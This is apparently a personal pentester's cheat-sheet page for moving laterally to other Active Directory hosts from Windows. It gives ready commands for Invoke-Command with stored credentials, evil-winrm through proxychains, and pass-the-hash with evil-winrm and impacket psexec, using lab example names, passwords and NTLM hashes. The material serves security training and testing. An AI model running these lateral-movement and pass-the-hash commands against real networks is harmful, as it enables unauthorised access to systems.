AD: Connecting to other hosts

Resources

• [TheHacker.recipes](https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword#forcechangepassword

Index of Active Directory

Hardening and auditing Active Directory

Attacking from linux

• Enumerating Active Directory from Linux
• Attacking Active Directory from Linux
• Lateral Movement in Active Directory from Linux
• Privileges escalation in Active Directory from Linux

Attacking from Windows

• Enumerating Active Directory from Windows
• Active directory: connecting to other hosts
• Attacking Active Directory from Windows
• Privileges escalation in Active Directory from Windows

Linux in AD

• Linux in active directory

Invoke-Command

Invoke-Command allows the executions of commands in remote hosts. We can use a "nested" Invoke-Command to send credentials (after creating a PSCredential object) with every request.

# 1. Now we will create a Secure-string object with the credential of the user svc_sql. Then we will use Invoke-Command to run a command in the host MS01
# 1. We create a SecureString Object with our creds
$SecPassword = ConvertTo-SecureString '$password' -AsPlainText -Force
# Example: 
# $SecPassword = ConvertTo-SecureString '!qazXSW@' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('$domain\$userSamAccountName', $SecPassword)
# Example:
# $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)

# 2. We send the nested Invoke-Command
Invoke-Command -ComputerName "$hostname.$domainName" -Credential $cred -ScriptBlock { Get-Content "C:\Users\Administrator\Desktop\flag.txt" }
# Example: 
# Invoke-Command -ComputerName "MS01.INLANEFREIGHT.LOCAL" -Credential $cred -ScriptBlock { Get-Content "C:\Users\Administrator\Desktop\flag.txt" }

Enter-PSSession

Evil-Winrm

With a pivot host and chisel + proxychains

proxychains evil-winrm -i $ip -u $user -p $password

With hashes:

evil-winrm -i $ip -u Administrator -H "32693b11e6aa90eb43d32c72a07ceea6"

psexec.py

With a pivot host and chisel + proxychains

proxychains tools/impacket/examples/psexec.py INLANEFREIGHT.LOCAL/svc_sql:lucky7@172.16.6.50

Passing a hash:

# An example: 
python3 psexec.py Administrator@$ip -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

# Another example:
impacket-psexec egotistical-bank.local/administrator@$ip -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e

mstsc.exe

Last update: 2025-01-19
Created: January 3, 2025 20:08:12